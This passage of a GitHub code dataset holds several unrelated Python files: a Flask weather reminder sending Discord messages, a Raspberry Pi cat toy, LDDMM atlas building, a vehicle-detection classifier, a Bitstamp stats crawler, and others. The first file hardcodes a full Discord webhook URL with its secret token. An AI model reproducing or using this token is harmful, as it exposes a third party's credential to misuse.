webhook_url=\"https://discordapp.com/api/webhooks/1163495849842704565/I7SJdtkonFMMvuXFs3GQTshXtwCB47N3juFGLNtBf1bLAevRIXukZdH82j31jfhRbCxQ\"\n data={\"content\":\"Hi \"+name+\",\\n\"+content}\n headers = {'Content-Type': 'application/json'}\n requests.post(webhook_url, data=json.dumps(data), headers=headers) \n #time.sleep(28800)\n time.sleep(60)\n\n\n#control=0 =>will not send msg to discord\ncontrol=0\n\ndef schedule_sendmsg(name,content):\n global control\n while control==1:\n #schedule.every().monday.at(\"09:00\").do(sendmsg,name,content[0])#早上發\n #schedule.every().tuesday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().wednesday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().thursday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().friday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().monday.at(\"18:00\").do(sendmsg,name,content[1])#晚上發\n #schedule.every().tuesday.at(\"18:00\").do(sendmsg,name,content[1])\n #schedule.every().wednesday.at(\"18:00\").do(sendmsg,name,content[1])\n #schedule.every().thursday.at(\"18:00\").do(sendmsg,name,content[1])\n #schedule.every().friday.at(\"18:00\").do(sendmsg,name,content[1])\n schedule.every().friday.at(\"19:25\").do(sendmsg,name,content[1])\n schedule.run_pending()\n time.sleep(60)\n\n#set control=1 and open clock to send msg to discord\n@app.route('/api/remind', methods=['GET'])\ndef api_remind():\n global control\n #need to add query string ex: /api/remind?username=123&cityselect=新北市\n city=request.args.get(\"cityselect\")\n username=request.args.get(\"username\")\n data=getweather.get_location_weather(city)\n try:\n control=1\n task_thread = threading.Thread(target=schedule_sendmsg, args=(username, data))\n task_thread.daemon = True\n task_thread.start()\n\n data = {\"message\":\"成功發送\"}\n return jsonify(data)\n except Exception as e:\n return jsonify({\"error\":\"發送失敗\"+str(e)})\n\n\n#set control=0 and turn off reminder\n@app.route('/api/turnoff', methods=['GET'])\ndef api_turnoff():\n global control\n try:\n control=0\n print(control)\n data = {\"message\":\"成功關閉\"}\n return jsonify(data)\n except Exception as e:\n return jsonify({\"error\":\"關閉失敗\"+str(e)})\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)","repo_name":"jason407891/fifth-team-weather","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29944405407","text":"\ndef min_removals(txt1, txt2):\n x=list(txt1)\n y=list(txt2)\n y.sort()\n d=\"\".join(y)\n e=\"\".join(x)\n z=[]\n for i in range(len(x)):\n if x[i] in y:\n z.append(x[i])\n a=(\"\".join(z))\n b=d.strip(a)\n c=e.strip(a)\n return(len(b)+len(c))\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"KYGpco9NFmJRyMQqj_14.py","file_name":"KYGpco9NFmJRyMQqj_14.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38594415319","text":"import RPi.GPIO as GPIO\nimport time\nimport random\nrandom.seed()\n\n#set pins\nGPIO.setmode (GPIO.BOARD)\nGPIO.setwarnings (False)\nGPIO.setup (11, GPIO.OUT) #laser power\nGPIO.setup (13, GPIO.OUT) #X-servo\nGPIO.setup (15, GPIO.OUT) #Y-servo\nGPIO.setup (19, GPIO.IN, pull_up_down=GPIO.PUD_UP) #in from IR\n\n#setup servo pwm\np = GPIO.PWM (13, 50)\nq = GPIO.PWM (15, 50)\n\n#set both servos to center to start\np.start (7.5)\nq.start (7.5)\n\ndef moveServos():\n \"Turns on laser and moves X- and Y-servos randomly\"\n lightLaser ()\n\n p.ChangeDutyCycle (random.randint (8, 12))\n time.sleep (random.random())\n q.ChangeDutyCycle (random.randint (8, 12))\n time.sleep (random.random())\n\n p.ChangeDutyCycle (random.randint (3, 5))\n time.sleep (random.random())\n q.ChangeDutyCycle (random.randint (3, 5))\n time.sleep (random.random())\n\n dimLaser ()\n\ndef lightLaser():\n GPIO.output (11, 1)\n\ndef dimLaser():\n GPIO.output (11, 0)\n\n#main loop\nwhile True:\n #check for input from sensor\n if GPIO.input (19):\n moveServos()\n time.sleep (0.5) #wait a half sec before polling sensor\n else:\n dimLaser()\n time.sleep (0.5)\n","repo_name":"Apress/Learn-Rasp-Pi-Program-Python","sub_path":"Chapter9/cat_toy.py","file_name":"cat_toy.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"} +{"seq_id":"37308223913","text":"import torch\nfrom torch.distributed import barrier\nimport os\n\nfrom cmdline import *\nfrom atlas import *\n\noasis_ds_std = OASISDataset(crop=None,\n h5path=f'{prefix}convaffinestd_{suffix}.h5',\n pooling=None,\n one_scan_per_subject=False)\noasis_ds_test_std = OASISDataset(crop=None,\n h5path=f'{prefix}convaffinestd_test_{suffix}.h5',\n pooling=None,\n one_scan_per_subject=False)\n\ndeepaffinefile = f'{prefix}deepaffine_{suffix}.pth'\nI_deepaffine, affine_net, epoch_losses_deepaffine, full_losses_deepaffine, \\\n iter_losses_deepaffine, test_losses_deepaffine \\\n = torch.load(deepaffinefile, map_location=loc)\nI_deepaffine = I_deepaffine.to(loc)\n\nfluid_params = [.1,0,.01]\nreg_weight = 1e4\n\nif rank == 0: torch.save(fluid_params, f'{prefix}fluidparams_{suffix}.pth')\nconvlddmmfile = f'{prefix}convlddmm_{suffix}.pth'\nif not os.path.isfile(convlddmmfile): # conventional lddmm atlas\n print(\"Conventional LDDMM atlas building\")\n res = lddmm_atlas(dataset=oasis_ds_std,\n I0=I_deepaffine.clone().to('cuda'),\n fluid_params=fluid_params,\n learning_rate_pose=1e-3,\n learning_rate_image=5e4,\n reg_weight=reg_weight,\n momentum_preconditioning=False,\n batch_size=30,\n num_epochs=500,\n gpu=gpu,\n world_size=args.world_size,\n rank=rank)\n if rank == 0: torch.save(res, convlddmmfile)\nelse:\n torch.load(convlddmmfile, map_location='cpu')\nbarrier()\nIlddmm, _, _, _ = res\nIlddmm = Ilddmm.to(loc)\n\n# On the test set, use same atlas-building code but with zero learning rate for\n# the image\nconvlddmmtestfile = f'{prefix}convlddmm_test_{suffix}.pth'\nif not os.path.isfile(convlddmmtestfile): # conventional lddmm atlas\n print(\"Conventional LDDMM Test\")\n res = lddmm_atlas(dataset=oasis_ds_test_std,\n I0=Ilddmm,\n fluid_params=fluid_params,\n learning_rate_pose=1e-3,\n learning_rate_image=0e4,\n momentum_preconditioning=False,\n reg_weight=reg_weight,\n batch_size=30,\n num_epochs=1,\n lddmm_steps=500,\n gpu=gpu,\n world_size=args.world_size,\n rank=rank)\n if rank == 0: torch.save(res, convlddmmtestfile)\n del res\n#Ilddmm, mom_lddmm, epoch_losses, iter_losses = torch.load(convlddmmtestfile,\n #map_location=loc)\n","repo_name":"jacobhinkle/diffeomorphic_autoencoders","sub_path":"run_convlddmm.py","file_name":"run_convlddmm.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"25461703327","text":"import pygame\nfrom GObject import GObject, Constants\nfrom text import Text\nfrom graph import Graph\n\n\nclass ControlPanel(GObject):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.width = 300\n self.image = pygame.Surface((self.width, Constants.HEIGHT.value))\n self.image.set_alpha(100)\n self.image.fill(Constants.WHITE.value)\n self.rect = self.image.get_rect()\n self.rect.right = Constants.WIDTH.value\n self.rect.bottom = Constants.HEIGHT.value\n # GObject.all_objects.add(self)\n GObject.control_panel.add(self)\n\n self.population_graph = Graph(y=GObject.current_population_list,\n x=GObject.duration_cell_list,\n size=(250, 150))\n self.population_graph.rect.centerx, self.population_graph.rect.top = (Constants.WIDTH.value - 150, 20)\n self.population_graph.color = Constants.RED.value\n self.population_graph.xlabel.text = 'Frames'\n self.population_graph.ylabel.text = 'Count of cells'\n\n self.current_food_graph = Graph(y=GObject.current_food_list,\n x=GObject.duration_food_list,\n size=(250, 150))\n self.current_food_graph.rect.centerx = Constants.WIDTH.value - 150\n self.current_food_graph.rect.top = self.population_graph.rect.bottom + 40\n self.current_food_graph.color = Constants.BLUE.value\n self.current_food_graph.xlabel.text = 'Frames'\n self.current_food_graph.ylabel.text = 'Count of food'\n\n self.count_of_extinction = Text(30)\n self.fps = Text(30)\n self.duration = Text(30)\n self.current_food = Text(30)\n self.total_food = Text(30)\n self.current_population = Text(30)\n self.total_born = Text(30)\n\n def update(self):\n self.count_of_extinction.update(text=f'Count of extinction: {GObject.count_of_extinction}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 210),\n color=Constants.BLACK.value)\n self.duration.update(text=f'Duration: {GObject.duration // 60}m or {GObject.duration // 3600}h',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 180),\n color=Constants.BLACK.value)\n self.fps.update(text=f'FPS: {GObject.fps}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 150),\n color=Constants.BLACK.value)\n self.current_food.update(text=f'Current food: {len(GObject.food)}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 120),\n color=Constants.BLACK.value)\n self.total_food.update(text=f'Total food: {GObject.count_of_food_ever}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 90),\n color=Constants.BLACK.value)\n self.current_population.update(text=f'Current population: {len(GObject.cells)}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 60),\n color=Constants.BLACK.value)\n self.total_born.update(text=f'Total born: {GObject.count_of_cells_ever}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 30),\n color=Constants.BLACK.value)\n self.population_graph.update()\n self.current_food_graph.update()\n\n def draw(self):\n pygame.display.get_surface().blit(self.image, (self.rect.x, self.rect.y))\n self.count_of_extinction.draw()\n self.duration.draw()\n self.fps.draw()\n self.current_food.draw()\n self.total_food.draw()\n self.current_population.draw()\n self.total_born.draw()\n self.population_graph.draw()\n self.current_food_graph.draw()\n","repo_name":"vallenov/TheLittleLife","sub_path":"control_panel.py","file_name":"control_panel.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24094968130","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 22 07:40:04 2017\n\n@author: jerome\n\"\"\"\n\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport glob\nimport time\nimport pickle\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\nfrom skimage.feature import hog\nfrom lesson_functions import *\nfrom find_object import *\n# NOTE: the next import is only valid for scikit-learn version <= 0.17\n# for scikit-learn >= 0.18 use:\nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n# Define a function to extract features from a single image window\n# This function is very similar to extract_features()\n# just for a single image rather than list of images\ndef single_img_features(img, color_space='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True): \n #1) Define an empty list to receive features\n img_features = []\n #2) Apply color conversion if other than 'RGB'\n if color_space != 'RGB':\n if color_space == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n elif color_space == 'SVCb':\n feature_image1 = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n feature_image2 = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n feature_image3 = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n feature_image = np.dstack((feature_image1[:,:,2],feature_image2[:,:,2],feature_image3[:,:,2]))\n else: feature_image = np.copy(img) \n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n #4) Append features to list\n img_features.append(spatial_features)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(feature_image, nbins=hist_bins)\n #6) Append features to list\n img_features.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.extend(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True)) \n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n #8) Append features to list\n img_features.append(hog_features)\n\n #9) Return concatenated array of features\n return np.concatenate(img_features)\n\n# Define a function you will pass an image \n# and the list of windows to be searched (output of slide_windows())\ndef search_windows(img, windows, clf, scaler, color_space='RGB', \n spatial_size=(32, 32), hist_bins=32, \n hist_range=(0, 256), orient=9, \n pix_per_cell=8, cell_per_block=2, \n hog_channel=0, spatial_feat=True, \n hist_feat=True, hog_feat=True):\n\n #1) Create an empty list to receive positive detection windows\n on_windows = []\n #2) Iterate over all windows in the list\n for window in windows:\n #3) Extract the test window from original image\n test_img = cv2.resize(img[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64)) \n #4) Extract features for that window using single_img_features()\n features = single_img_features(test_img, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n #5) Scale extracted features to be fed to classifier\n test_features = scaler.transform(np.array(features).reshape(1, -1))\n #6) Predict using your classifier\n prediction = clf.predict(test_features)\n #7) If positive (prediction == 1) then save the window\n if prediction == 1:\n on_windows.append(window)\n #8) Return windows for positive detections\n return on_windows\n\n# Read in cars and notcars from large dataset\ncars = glob.glob('./dataset/vehicles/*/*.png')\nnotcars = glob.glob('./dataset/non-vehicles/*/*.png')\n\n### TODO: Tweak these parameters and see how the results change.\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\norient = 9 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = \"ALL\" # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (16, 16) # Spatial binning dimensions\nhist_bins = 16 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\ny_start_stop = [None, None] # Min and max in y to search in slide_window()\n\ncar_features = extract_features(cars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\nnotcar_features = extract_features(notcars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n\nX = np.vstack((car_features, notcar_features)).astype(np.float64) \n# Fit a per-column scaler\nX_scaler = StandardScaler().fit(X)\n# Apply the scaler to X\nscaled_X = X_scaler.transform(X)\n\n# Define the labels vector\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(notcar_features))))\n\n#############\n# Parameter Estimation for SVM\n#X_train, X_test, y_train, y_test = train_test_split(\n# scaled_X, y, test_size=0.5, random_state=0)\n# Set the dataset in two equal parts\n#tuned_parameters = [{'kernel':['rbf'], 'gamma':[1e-3,1e-4], 'C': [1,10,100,1000]},\n# {'kernel':['linear'], 'C': [1,10,100,1000]}]\n#clf = GridSearchCV(SVC(C=1), tuned_parameters, cv=5)\n#clf.fit(X_train,y_train)\n#print(clf.best_params_)\n\n# Split up data into randomized training and test sets\nrand_state = np.random.randint(0, 100)\nX_train, X_test, y_train, y_test = train_test_split(\n scaled_X, y, test_size=0.2, random_state=rand_state)\n\nprint('Using:',orient,'orientations',pix_per_cell,\n 'pixels per cell and', cell_per_block,'cells per block')\nprint('Feature vector length:', len(X_train[0]))\n# Use a linear SVC \nsvc = LinearSVC()\n# Check the training time for the SVC\nt=time.time()\nsvc.fit(X_train, y_train)\nt2 = time.time()\nprint(round(t2-t, 2), 'Seconds to train SVC...')\n# Check the score of the SVC\nprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\n# Check the prediction time for a single sample\n\nf = open(\"svc_pickle.p\", \"wb\" )\nparams ={\"svc\":svc, \"scaler\":X_scaler, \"orient\":orient, \"pix_per_cell\":pix_per_cell, \"cell_per_block\":cell_per_block, \n \"spatial_size\":spatial_size, \"hist_bins\":hist_bins}\npickle.dump(params, f)\nf.close()\n\nt=time.time()\n\nimg = mpimg.imread('test_images/test1.jpg')\n\nystart = 400\nystop = 656\n \nheat = np.zeros_like(img[:,:,0]).astype(np.float)\n\nbox_list = []\n\nfor scale in np.arange(0.5,2,0.2) :\n box_list = find_cars(img,box_list, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins)\n\n# Add heat to each box in box list\nheat = add_heat(heat,box_list)\n \n# Apply threshold to help remove false positives\nheat = apply_threshold(heat,10) # 20 was best\n\n# Visualize the heatmap when displaying \nheatmap = np.clip(heat, 0, 255)\n\n# Find final boxes from heatmap using label function\nlabels = label(heatmap)\ndraw_img = draw_labeled_bboxes(np.copy(img), labels)\n\nplt.imshow(heatmap)\n","repo_name":"Jaeyong-Han/Self-Driving-Car_Nanodegree","sub_path":"CarND-Project5_Vehicle-Detection/search_classify.py","file_name":"search_classify.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73187922330","text":"import json\nimport logging\nimport os\nimport time\nfrom typing import Any, Dict, List, Optional\n\nimport requests\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef merge_data(prev: List[Dict[str, Any]], curr: List[Dict[str, Any]]) -> List[Dict[str, Any]]:\n '''Merge curr into prev, the element in list must have a date field.'''\n for c in curr:\n x: Optional[Dict[str, Any]] = None\n for p in prev:\n if p['date'] == c['date']:\n x = p\n break\n if x is None:\n prev.append(c)\n else:\n x.update(c)\n return sorted(prev, key=lambda d: d['date'])\n\n\ndef http_get(url: str, field_name: str) -> List[Dict[str, Any]]:\n resp = requests.get(url=url)\n if resp.status_code == 200:\n data = resp.json()\n return data[field_name]\n else:\n logging.warning(f'{url} {resp.status_code} {resp.text}')\n if resp.status_code == 429:\n exit(0)\n return []\n\n\ndef get_coins() -> List[str]:\n url = 'https://www.bitstamp.net/api/v2/trading-pairs-info/'\n resp = requests.get(url=url)\n if resp.status_code == 200:\n symbols = resp.json()\n coins = [s['name'].split('/')[0].lower() for s in symbols]\n coins = sorted(list(set(coins)))\n return coins\n else:\n logging.warning(f'{url} {resp.status_code} {resp.text}')\n if resp.status_code == 429:\n exit(0)\n return []\n\n\ndef get_price(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/financial/price'\n curr = http_get(url=url, field_name='price')\n file_path = f'./data/price-{coin}.json'\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\ndef get_transactions(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/network/transactions'\n curr = http_get(url=url, field_name='txsStats')\n file_path = f'./data/transactions-{coin}.json'\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\ndef get_addresses(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/network/addresses'\n curr = http_get(url=url, field_name='addressesStats')\n file_path = f'./data/addresses-{coin}.json'\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\ndef get_large_transactions(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/financial/large_transactions'\n file_path = f'./data/large_transactions-{coin}.json'\n curr = http_get(url=url, field_name='largeTxs')\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\nif __name__ == \"__main__\":\n # // 8000 requests per 10 minutes, see `REQUEST LIMITS` at https://www.bitstamp.net/api/\n cooldown_time = 0.075\n coins = get_coins()\n for coin in coins:\n logging.info(coin)\n get_price(coin)\n time.sleep(cooldown_time)\n get_transactions(coin)\n time.sleep(cooldown_time)\n get_addresses(coin)\n time.sleep(cooldown_time)\n get_large_transactions(coin)\n time.sleep(cooldown_time)\n","repo_name":"crypto-crawler/bitstamp-insights","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"74190914652","text":"'''\n1. 공백을 기준으로 slice후 리스트 저장: str.slice()\n2. list[i] %2 == 0 : upper\n3. list[i] %2 != 0 : lower\n'''\n\ndef solution(s):\n answer = ''\n new_list = s.split(' ')\n for i in new_list:\n for j in range(len(i)):\n if j%2==0:\n answer += i[j].upper()\n else:\n answer += i[j].lower()\n answer += ' '\n return answer[0:-1]\n \n \n\nprint(solution(\"try hello world\"))","repo_name":"dayowoo/Algorithm-Study","sub_path":"programmers/Level1/이상한 문자 만들기.py","file_name":"이상한 문자 만들기.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24473868260","text":"import sqlite3\nimport mutagen\n\n\nclass Album:\n def __init__(self, db_path):\n self.db_path = db_path\n self.conn = sqlite3.connect(self.db_path)\n self.cur = self.conn.cursor()\n\n # def __del__(self):\n # self.conn.close()\n\n def add_album(self, title, artist_name):\n self.cur.execute(\"SELECT id FROM artist WHERE name = ?\", (artist_name,))\n artist_id = self.cur.fetchone()\n if not artist_id:\n self.cur.execute(\"INSERT INTO artist (name) VALUES (?)\", (artist_name,))\n artist_id = self.cur.lastrowid\n else:\n artist_id = artist_id[0]\n self.cur.execute(\"INSERT INTO album (title, artist_id) VALUES (?, ?, ?)\", (title, artist_id))\n self.conn.commit()\n\n def delete_album(self, album_id):\n self.cur.execute(\"DELETE FROM album WHERE id = ?\", (album_id,))\n self.conn.commit()\n\n def modify_tag(self, album_id, field, value):\n self.cur.execute(\"SELECT filename FROM library WHERE album_id = ?\", ( album_id,))\n filenames = self.cur.fetchall()\n for filename in filenames:\n try:\n audio = mutagen.File(filename[0])\n if audio:\n audio[field] = value\n audio.save()\n except Exception as e:\n print(f\"Error modifying tag for {filename[0]}: {e}\")\n\n def show(self, album_id):\n self.cur.execute(\n \"SELECT album.title, artist.name FROM album JOIN artist ON album.artist_id = artist.id WHERE album.id = ?\",\n (album_id,))\n row = self.cur.fetchone()\n if row:\n print(f\"Album: {row[0]}\")\n print(f\"Artist: {row[1]}\")\n self.cur.execute(\"SELECT title, artist, duration, genre FROM library WHERE album_id = ?\", (album_id,))\n rows = self.cur.fetchall()\n for row in rows:\n print(row)\n","repo_name":"kandriadze/cli_id3","sub_path":"Album.py","file_name":"Album.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13642561739","text":"'''\nFrom https://github.com/tsc2017/Inception-Score\nCode derived from https://github.com/openai/improved-gan/blob/master/inception_score/model.py and https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/gan/python/eval/python/classifier_metrics_impl.py\n\nUsage:\n Call get_inception_score(images, splits=10)\nArgs:\n images: A numpy array with values ranging from 0 to 255 and shape in the form [N, 3, HEIGHT, WIDTH] where N, HEIGHT and WIDTH can be arbitrary. \n dtype of the images is recommended to be np.uint8 to save CPU memory.\n splits: The number of splits of the images, default is 10.\nReturns:\n Mean and standard deviation of the Inception Score across the splits.\n'''\n\nimport os, sys\nimport functools\nimport time\nimport argparse\nfrom tqdm import tqdm\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import functional_ops\ntfgan = tf.contrib.gan\n\n\nclass InceptionScore():\n def __init__(self, batch_size, name):\n self.batch_size = batch_size \n self.inception_images = tf.placeholder(tf.float32, [self.batch_size, 3, None, None])\n self.logits = self.inception_eval(name)\n\n def inception_eval(self, name):\n images = self.inception_images\n images = tf.transpose(images, [0, 2, 3, 1])\n size = 299\n images = tf.image.resize_bilinear(images, [size, size])\n generated_images_list = array_ops.split(images, num_or_size_splits=1)\n logits = functional_ops.map_fn(\n fn = functools.partial(tfgan.eval.run_inception, output_tensor=name),\n elems = array_ops.stack(generated_images_list),\n parallel_iterations = 1,\n back_prop = False,\n swap_memory = True,\n name = 'RunClassifier')\n logits = array_ops.concat(array_ops.unstack(logits), 0)\n return logits\n\n def get_inception_probs(self, sess, inps):\n n_batches = len(inps) // self.batch_size\n preds = np.zeros([n_batches * self.batch_size, 1000], dtype=np.float32)\n for i in tqdm(range(n_batches)):\n inp = inps[i * self.batch_size : (i + 1) * self.batch_size] / 127.5 - 1\n preds[i * self.batch_size : (i + 1) * self.batch_size] = sess.run(self.logits, feed_dict={self.inception_images: inp})[:, :1000]\n preds = np.exp(preds) / np.sum(np.exp(preds), 1, keepdims=True)\n return preds\n\n def preds2score(self, preds):\n scores = []\n splits = 1\n for i in range(splits):\n part = preds[(i * preds.shape[0] // splits):((i + 1) * preds.shape[0] // splits), :]\n kl = part * (np.log(part) - np.log(np.expand_dims(np.mean(part, 0), 0)))\n kl = np.mean(np.sum(kl, 1))\n scores.append(np.exp(kl))\n return np.mean(scores), np.std(scores)\n\n def get_inception_score(self, images):\n assert(type(images) == np.ndarray)\n assert(len(images.shape) == 4)\n assert(images.shape[1] == 3)\n assert(np.min(images[0]) >= 0 and np.max(images[0]) > 10), 'Image values should be in the range [0, 255]'\n print('Calculating Inception Score with %i images in %i splits' % (images.shape[0], 1))\n start_time = time.time()\n with tf.Session() as sess:\n preds = self.get_inception_probs(sess, images)\n mean, std = self.preds2score(preds)\n print('Inception Score calculation time: %f s' % (time.time() - start_time))\n return mean, std # Reference values: 11.34 for 49984 CIFAR-10 training set images, or mean=11.31, std=0.08 if in 10 splits.\n\ndef get_images_from_files(path):\n import cv2\n #images = np.empty(shape=[50000, 3, 32, 32], dtype=np.uint8) # CIFAR10\n #images = np.empty(shape=[100000, 3, 48, 48], dtype=np.uint8) # STL10 (unlabeled, resized)\n images = np.empty(shape=[50000, 3, 48, 48], dtype=np.uint8) # STL10 (generated)\n idx = 0\n for root, dir, files in os.walk(path):\n for file in files:\n if file.endswith(tuple(['.jpg', '.png', 'bmp'])):\n image_path = os.path.join(root, file)\n img = cv2.imread(image_path)\n img = img[:, :, (2, 1, 0)] # BGR to RGB \n img = np.transpose(img, (2, 0, 1)) # RGB, H, W \n images[idx] = img\n idx += 1\n if idx >= images.shape[0]:\n break\n print('images.shape: {}'.format(images.shape))\n return images\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', help='comma separated GPU list to use')\n parser.add_argument('--data_dir', help='path to data folder')\n args = parser.parse_args()\n\n if args.gpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu \n\n images = get_images_from_files(args.data_dir) \n mean, std = InceptionScore(64, 'logits:0').get_inception_score(images)\n print('IS: ', mean, std)\n\n # images = get_images_from_files(args.data_dir)\n # with tf.Session() as sess:\n # preds = InceptionScore(100, 'pool_3:0').get_inception_probs(sess, images)\n # #np.save('/home/minje/dev/dataset/cifar/cifar10_inception_pool_3.npy', preds)\n # np.save('/home/minje/dev/dataset/stl/stl_unlabeled_inception_pool_3.npy', preds)\n \n\n","repo_name":"swotr/snwgan","sub_path":"IS/inception_score.py","file_name":"inception_score.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5168009945","text":"\"\"\"see https://adventofcode.com/2022/day/1\"\"\"\r\n\r\nfrom argparse import ArgumentParser\r\nfrom typing import Iterator\r\n\r\ndef make_parser() -> ArgumentParser:\r\n parser = ArgumentParser()\r\n parser.add_argument(\"input\", help=\"input file\")\r\n return parser\r\n\r\ndef split_on(s, seq):\r\n \"\"\"splits seq on s\"\"\"\r\n acc = []\r\n for each in seq:\r\n if each == s:\r\n yield acc\r\n acc = []\r\n else:\r\n acc.append(each)\r\n yield acc\r\n\r\nif __name__ == '__main__':\r\n matches = 